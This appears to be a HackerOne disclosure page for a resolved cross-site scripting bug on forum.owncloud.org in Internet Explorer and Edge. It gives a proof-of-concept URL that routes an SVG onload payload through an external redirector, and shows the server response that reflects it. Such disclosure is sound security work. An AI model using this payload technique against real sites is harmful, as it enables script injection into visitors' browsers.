[forum.owncloud.org] IE, Edge XSS via Request-URI

Disclosed: 2016-08-30 16:26:03 By bobrov To owncloud

Unknown

Vulnerability Details

**PoC** (Internet Explorer, Edge): ``` https://blackfan.ru/x?r=https://forum.owncloud.org/<svg/onload=alert(document.domain)>/%252e%252e ``` blackfan.ru/x?r - simple redirection script, that necessary for exploitation **HTTP Response**: ```html <div class="panel" id="message"> <div class="inner"> <h2 class="message-title">Information</h2> <p>No route found for "GET /<svg/onload=alert(document.domain)>/%2e%2e"</p> </div> </div> ```

Actions

View on HackerOne

Report Stats

Report ID: 154319
State: Closed
Substate: resolved
Upvotes: 2

[forum.owncloud.org] IE, Edge XSS via Request-URI

Vulnerability Details

Actions

Report Stats

Share this report